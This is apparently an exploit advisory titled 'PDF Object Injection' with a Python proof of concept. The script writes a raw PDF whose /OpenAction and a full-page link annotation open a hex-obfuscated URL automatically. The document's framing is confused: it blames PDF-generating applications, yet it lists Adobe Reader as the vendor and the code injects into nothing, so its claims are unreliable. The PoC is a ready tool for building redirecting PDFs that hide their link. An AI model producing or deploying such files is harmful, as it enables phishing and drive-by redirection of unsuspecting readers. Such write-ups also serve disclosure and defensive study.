=============================================================================================================================================
| # Title     : PDF Object Injection Vulnerability – Impact on PDF Readers                                                                  |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://get.adobe.com/reader/                                                                                               |
=============================================================================================================================================

[+] Summary    : PDF Object Injection is a vulnerability in applications that dynamically generate PDFs from user input without proper validation or escaping. 
                 An attacker can inject PDF objects (e.g., /OpenAction, /URI, or JavaScript), potentially creating malicious PDFs that perform automatic link redirects, execute scripts, or modify metadata. 
                 This vulnerability exists in the PDF-generating application, not in PDF readers like Adobe Acrobat, Chrome, or Firefox. Proper input sanitization, escaping, and secure PDF libraries prevent this issue

[+] Note  :     that you do not need external libraries such as jsPDF.
                The same exploit works with the jsPDF library.

[+] POC   :  

import os

def create_raw_obfuscated_pdf(filename, target_url):

    hex_url = "".join([f"{ord(c):02x}" for c in target_url])
    hex_payload = f"<{hex_url}>"

    pdf_content = (
        f"%PDF-1.7\n"
        f"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >>\nendobj\n" 
        f"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
        f"3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Annots [4 0 R] >>\nendobj\n"
        f"4 0 obj\n<< /Type /Annot /Subtype /Link /Rect [0 0 612 792] /Border [0 0 0] /A 5 0 R >>\nendobj\n" 
        f"5 0 obj\n<< /S /URI /URI {hex_payload} >>\nendobj\n" 
        f"xref\n0 6\n0000000000 65535 f\n0000000010 00000 n\n0000000079 00000 n\n"
        f"0000000139 00000 n\n0000000220 00000 n\n0000000318 00000 n\ntrailer\n"
        f"<< /Size 6 /Root 1 0 R >>\nstartxref\n400\n%%EOF"
    )

    try:

        with open(filename, "wb") as f:
            f.write(pdf_content.encode('latin-1'))
        print("-" * 50)
        print(f" Raw file created (No libraries used): {filename}")
        print(f" Obfuscated link inside the file: {hex_payload}")
        print("-" * 50)
    except Exception as e:
        print(f" Write error: {e}")

if __name__ == "__main__":

    desktop = os.path.join(os.environ['USERPROFILE'], 'Desktop')
    file_path = os.path.join(desktop, "Pure_Raw_Exploit.pdf")

    target = "https://packetstorm.news"
    
    create_raw_obfuscated_pdf(file_path, target)


Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================